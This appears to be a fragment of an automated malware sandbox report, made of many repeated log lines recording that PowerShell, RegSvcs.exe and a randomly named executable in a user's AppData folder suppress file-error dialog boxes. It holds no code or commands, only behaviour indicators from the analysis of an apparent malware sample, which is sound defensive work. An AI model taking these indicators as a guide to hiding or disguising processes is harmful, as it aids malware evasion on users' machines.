                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
